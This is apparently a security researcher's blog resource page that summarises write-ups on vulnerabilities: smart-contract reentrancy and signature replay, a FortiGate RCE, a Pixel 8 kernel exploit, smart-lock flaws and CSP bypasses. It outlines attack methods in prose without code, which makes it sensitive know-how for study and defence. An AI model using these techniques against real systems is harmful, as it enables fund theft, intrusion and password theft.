Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Cronos Reentancy Bug- 1375

Father Goose    Reference →Posted 1 Year Ago
  • Cronos is a Cosmos based chain that uses Ethermint as the smart contract runtime platform. They have the largest TVL within the Cosmos system.
  • Reentrancy is a vulnerability class where a user can execute some smart contract functionality, make an external call while the state is partially updated then abuse this partially updated state. It is a unique and common bug class to Solidity.
  • Within the TectonicStakingPoolV3, a user can call the function performConversionForTokens() with a path of different tokens. However, this doesn't contain an allowlist or checks for reentrancy.
  • Using the lack of protections, an attacker can stake their balance part way through the swap path. Why is this bad? Both before and after doing the swap, there is a call to balanceOf for TONIC on the current contract. The sent in amount of TONIC is thought to be amount that the user now has, crediting them all of this.
  • By calling stake() part way through the execution of this, an attacker can send in tokens as part of the stake. So, they get counted both as the stake and as part of the transfer, leading to a double use of the TONIC. By repeating this over and over again, it's possible to steal almost all of the funds from the protocol.
  • The response from Cronos is why this caught my attention. Cronos deemed that since this had a 10 day waiting period and they had sufficient monitoring in place that this wasn't a risk. So, instead of a large payout, they were going to give them 2K and move on. Immunefi rejected this, claimed it deserved a max payout then kicked Cronos off the platform when they refused.
  • To me, 2K is too low but a max payout is too high. Defense-in-depth measures need to be taken into consideration. The timelock is sufficient to me to lower the impact but should still be high high or a low critical.
  • I don't like the precedent of having private monitoring tools as a silver bullet. 1) they can't be audited and 2) how do we know that people will respond to it correctly? Regardless, good finding and it's a bummer that they didn't pay out for this.

Discovering Non-Deterministic Behavior in Provenance Blockchain and Cosmos SDK- 1374

Provenance Blockchain Foundation    Reference →Posted 2 Years Ago
  • Different nodes in blockchain need to always come to the same state for a network to work. If the network is split in some way, then the network will not be able to come to consensus, taking the entire chain down. On the Provenance testnet, they noticed that the perceived state (app has) was different. So, what happened?
  • Using their block explorer, the final call was to MarkerTransferAuthorization with an authz wrapped call. So, the modules bank, authz, auth and marker were the only possible culprits here.
  • The Cosmos SDK has a tool just for this type of issue: iaviewer for reviewing the AVL tree for state changes. From this tool, they wrote a diff for the two different chain states. This came with some results.
  • The IAVL tree is just a rebalancing binary tree. The shape of it should change for each new node that is added. The good node wrote out an authz grant to the state store but the bad node did not. So, the bug must be in the authz grant side of it.
  • When setting up the grant, it was using the time.Now() value in Go. Yikes! A big source of non-determinism. When performing an upgrade, nodes that came on sooner were fine on these grants. However, some nodes that came on later after the upgrade would have been this grant fail! In the end of the day, this was actually an issue with the Cosmos SDK itself.
  • An interesting post on a debugging a Cosmos blockchain app hash issue. I bet I'll see this in the future so it was a super helpful post for me!

Two Bytes is Plenty: FortiGate RCE with CVE-2024-21762- 1373

AssetNote    Reference →Posted 2 Years Ago
  • FortiGate is an SSL VPN. Recently, they described a vulnerability in their firmware that could lead to RCE. So, the authors of this post diffed the two versions, found the bug and exploited it.
  • First, they obtained the firmware from somewhere (likely online) between the newest and a previous version of the software. Once they had decompiled the code, they looked for changes in different locations. One of them that caught their eye was an HTTP parsing change.
  • In particular, some changes to the amount of chunks that were allowed on transfer-encoding and the size of these chunks. So, with this, they had a potential vulnerability. After some effort with playing with these values, they got a crash. What was the crash about? The value 0x0a0d could be written to an arbitrary offset on the stack.
  • The debugging environment was interesting to me. The standard shell was very restricted and there were various protections in place to prevent changes. After reviewing the /bin/init binary, they found a signature check being performed but assumed more checks were in it. So, they patched the function do_halt() to not exit.
  • For the kernel checks, they modified the kernel build to allow for debugging with GDB. In GDB, they found the check, wrote a script to setup a breakpoint then specified a proper return value. From there, they copied a bunch of binaries to make their life easier.
  • The primitive was only a two byte write to an arbitrary address on the stack with the bytes 0xXXXXX0a0d. With this return addresses, saved base points and locals did not seem like get paths to hit. So, they decided to target a heap address that was on the stack that contained function pointers.
  • The binary didn't have PIE setup. So, they used this static address alongside heap spraying to reference the system function. Eventually, they got this working with a payload to run one of the limited commands in the shell. They eventually came up with a more complicated ROP chain to get a shell though.
  • Overall, an interesting post! Taking a seemingly difficult primitive to code execution is pretty nice!

Ahhhh i'm liquidating!- 1372

riptide    Reference →Posted 2 Years Ago
  • Deri is a derivatives protocol on various EVM platform. Users can add/remove margin, trade and so other functionality through the Gateway contract.
  • When removing margin, the users calls the requestRemoveMargin() it emits an event for a bot to see. Once the bot sees it, it will call finishRemoveMargin() with signed event data and a signature to finalize the request.
  • In total, there are three finishing calls: finishRemoveMargin, finishUpdateLiquidity and finishLiquidate. In the former two, they have an internal function for checking the _checkRequestId to increment the nonce to prevent replay attacks.
  • This crucial check is missing from the function finishLiquidate(). However, since the position NFT would have already been burned then it would have failed anyway. So, no issue, right?
  • What if we called one of the other functions? When decoding the information that is signed, there is NO check that the information is going to the proper function. When doing the actual value decoding, the original signed data has less information which I would have assumed a revert for not having enough data.
  • The first two values are the same. But, the cumlativePnlOnEngine field in the liquidate struct matches the requiredMargin field. Since the verification happened in the previous call, there is no validation on any of these values!
  • The liquidation value is scaled up to an insane amount. Additionally, other parts of the protocol have key invariants broken, allowing for more attacks. This was estimated to have a lost funds of 500K-1.5M, but with a bug bounty of only 10K, they reported the bug and moved on.
  • The signatures had two bad flaws. First, the missing nonce increment. Second, the signature could be used on more than one call. I was also surprised that the abi.decode() didn't fail with the different data lengths. Overall, good finding with a fun write up!

Gaining kernel code execution on an MTE-enabled Pixel 8- 1371

Man Yue Mo    Reference →Posted 2 Years Ago
  • Memory Tagging Extensions (MTE) is a memory corruption protection that was widely considered to be a killer of these types of bugs. The idea is to use the upper bits of a 64 bit pointer to give a random value to it. If the tag of the memory is different than the pointer being used, then a fault occurs, stopping the exploit.
  • The author of this post bought a Pixel 8, enabled MTE then tried to find a vulnerability that would work around these protections. They ended up targeting the JIT memory of the Arm Mali GPU driver.
  • When accessing a page that doesn't have a valid memory mapping, the GPU will increase the size of the space. However, there isn't proper locking when this occurs. So, a race condition allows for an invalid state to be created to cause pseudo-memory corruption.
  • Using some black magic, it's possible to mess with the mappings of the JIT memory. In particular, a section of memory can be treated as unmapped, even though it really isn't. Since the section is freed, it can be allocated as a standard kernel memory allocation.
  • Eventually, using some allocation magic, it's possible to get this memory to be used in the kernel (including kernel code) but still available to the GPU. Now, it's possible to rewrite the kernel from the GPU in order to compromise everything.
  • So, how does this bypass MTE? Well, there's no memory corruption! The pages array in the kernel and the GPU mappings of the JIT are valid from a memory corruption perspective. Since these are accessing physical pages, the MTE protections are not in place.
  • Overall, an interesting look into how some bugs do not care about MTE. The post goes too deep into the weeds of GPUs and kernel for me to understand but it's interesting to get the generic flow none-the-less.

Top-10 Vulnerabilities in Substrate-based Blockchains Using Rust- 1370

Bloqarl    Reference →Posted 2 Years Ago
  • Substrate is a framework for building application specific blockchains within the Polkadot ecosystem written in Rust. Each new chain inherits the security of the main chain, which is why it's a good choice. It's used by Manta, Band protocol and many others.
  • Since the substrate layer requires a lot of code to be written, there are common security issues that occur. Some of these are covered in this article. Some of these, such as insecure randomness, are the same on other chains so I won't cover these in my notes.
  • Substrate requires a model for charging for the usage of storage. If the rental rate for the space isn't expensive enough then it's possible to make the system sluggish. In particular, hackers should check that the gas costs are corresponding to the storage that was used. There is a similar issue for Insufficient Benchmarking on external calls as well.
  • The second interesting issue is an arbitrary decoding vulnerability. When passing in data, if it can decode to anything, then a highly nested structure can cause performance issues.
  • Cross Consensus Messaging (XCM) is a mechanism for communicating with different substrate systems, similar to IBC in Cosmos. If the actions being used in this sink are not carefully sanitized and considered then arbitrary Transact instructions could be executed. In theory, this would lead to unauthorized actions or system disruptions.
  • The other issues that are mentioned are integer related issues, replay attacks from not checking nonces and various other things. My biggest takeaway is that this is functionality very similar to Cosmos but in a different ecosystem. I wish actual findings from substrate blockchain audits were referenced here though.

Discovery of Reentrancy in ERC4626 Vault- 1369

hoshiyari420    Reference →Posted 2 Years Ago
  • The backstory on how vulnerabilities were discovered is always fascinating to me. To me, the vulnerability is cool but I want to be able to reproduce the research process to find my own bugs rather than find the individual vulnerability.
  • While auditing a project, they were concerned with the ERC-4626 vaults that they were integrated with. As a result, they decided to look into these. In one of the vaults, one of them was violating CEI. Are there more vaults?
  • When calling withdraw() to transfer ETH, the totalAssets were being updated after this call. So, the classic reentrancy was on!
  • To exploit the reentrancy, the author of the Twitter thread has a nice diagram. The basic idea is to get more and more of the assets with burning less and less of the shares. Eventually, this can be used to drain all of the assets, since the ratio of assets to shares gets broken.
  • With a vulnerability on a live project, what do you do? The author decided to hop in their discord and reach out to them. After not getting a response in 5 minutes they reached out to the SEAL-911 bot Telegram bot. Within 2 minutes, they responded to them. Using trusted channels contact had been made with the protocol at the 20 minute mark.
  • Now, 30 minute later they fixed the vulnerability and deployed the code. In the end, the vulnerability was patched at 51 minutes between starting the reporting process and fixed deployment. It's an incredibly fast time!
  • Overall, it's a great find! But, two things stick out to me. First, looking for issues in code that your client uses but isn't owned by feels strange to me. Is that really a good use of time by them? To me, it feels out of scope, even if there is impact.
  • The second thing was the response time. When the author didn't get a response in the Discord within 5 minutes, they reached out through alternative means. To me, this feels a tad aggressive and fast. If the vulnerability has been there for a year, what are the odds that an attacker going to find and exploit the issue at the same time if you spend a few extra hours waiting? Probably none but I appreciate the want to fix this for the protocol.

Say Friend and Enter: Digitally lockpicking an advanced smart lock (Part 2: discovered vulnerabilities) - 1368

Aleph Security    Reference →Posted 2 Years Ago
  • Locks being controlled by computers are great, until you realize that they are subject to security vulnerabilities like everything else. This post goes through hacking a smart lock through various techniques. The system has a single global AES key that is used to communicate with the lock. Although there is client side protections for giving and taking keys, since they have the AES key this doesn't matter.
  • The authors realized that a MitM attack was possible to get an encryption challenge and response by spoofing the locks information, since it will only hold a single connection at a time. By having our device get this open, we can advertise our fake lock only to get a victim app to connect to it. The authentication process uses a challenge to communicate with the lock.
  • This challenge value is only 16 bit integer. By trying to authorize with our encrypted message from the MitM, getting a 1/65536 chance then sending back the challenge response, we will become authenticated! This takes several seconds per attempt, resulting in several days for this to work.
  • When performing the decryption of the AES encrypted data, the code needs to know how many iterations to do. To find this out, it takes the length of the buffer and divides it by 16. However, it doesn't check if they are in groups of 16. So, by sending a non-divisible value of 16, such as 15, the decryption won't occur on those bytes. What does this mean? We can trick the process to process our plaintext data as decrypted. Abusing a different authentication, we can use vulnerability to trick the authentication process.
  • The app has an original version of the protocol. With this, the only encryption is a 1 byte repeating XOR key, such as 0xABAB.... It's possible to downgrade a user with a MitM to force this version of the protocol. Again, amazing.
  • The lock has another device called a gateway. This is used for internet communication. By spoofing a MAC address when talking to a server, it's possible to force a re-registration to reset some parts of the key material. This does require knowing the MAC address, which is difficult to get.
  • There is support for a wireless keypad to connect to the lock. Since the communication key is hardcoded for this initially, all users can send data here now problem. They can now send key presses over a single connection, which speeds up the process drastically. The code uses the strstr function as well, so de Bruijn sequences can be used to make this even more efficient. There is a lockout for failed attempts here though.
  • There is a second Bluetooth service being advertised. This literally allows for updating the firmware without any signature checks. That's game over.
  • Most of the time, debug ports are good for reverse engineering. In this case, the debug port is on the part of the board that is on the onside of the lock. So, if an attacker drilled a small hole in the lock, they could communicate with the debug port. With debug access, we would have complete control over the lock.
  • There are many, many classic cryptography issues within this. Downgrade attacks, brute forcing... many awesome things! This also shows that cryptography isn't always crazy complicated; just understanding some basics is helpful for exploitation.

GitHub’s CSP journey- 1367

Patrick Toomey     Reference →Posted 2 Years Ago
  • The Content Security Policy (CSP) is a mechanism for restrictions various components of a web page to prevent attacks. Github had revamped their CSP in 2016 and this is their article explaining how they did it.
  • First, they restricted the script-src to only allow content from their CDN. They removed the self from the list (which I thought would be fine on the page tbh) which removed some weird edge cases. In particular, mime sniffing issues from the browser and weird JSONP endpoints.
  • The next thing they restricted was object-src (used for emebeds) to not include self either. They removed this because of a person who found a CSP bypass from it. The hacker had found a content injection bug that allowed them to control the class attribute with some automatic behavior from JavaScript to fetch the href associated with the element. By doing this with a content sniffing issue they were able to get Flash code to execute within the embed alongside a Chrome browser bug.
  • They restricted the img-src to be much lower as well. Why is this important? Dangling Markup issues can allow for parts of a page to be sent in a URL if the source of an image isn't seriously considered. On a newer post they did, Cure53 found a way to abuse the dangling markup on Google Analytics and another website to exfiltrate information.
  • connect-src restrictions what domains can actually be connected to for fetch, websockets and other things. This limits various attacks by inherently not allowing interactions with the outside world.
  • form-action can be used to restrict where formed can be submitted to. Using password manager autofill or attacks similar to the dangling markup, this can be very useful. They have a few more restrictions on iframes as well, which is always a good thing.
  • Overall, an interesting dissection of the security of CSPs and how Github made theirs much more robust. Even though the article is quite old, it's still a great resource.

Using form hijacking to bypass CSP- 1366

Gareth Heyes    Reference →Posted 2 Years Ago
  • Content Security Policies (CSP) are a secondary line of defense for XSS bugs in the browser. So, as an attacker, having ways to circumvent the CSP is important for a full exploit chain.
  • The case for form hijacking is when you have an HTML injection vulnerability but can't escalate it to XSS because of the CSP. By adding a form to the page it may be possible to extract sensitive data, especially from over-eager password managers.
  • In the case of Mastadon, this worked to steal passwords with Chrome and a single user click. In this Gareth made the inputs have an opacity of zero to make it invisible.
  • The form-action was created as a directive in CSPv2. However, default-src doesn't cover form actions for some reasons. Overall, an interesting CSP bypass that will probably exist for a while.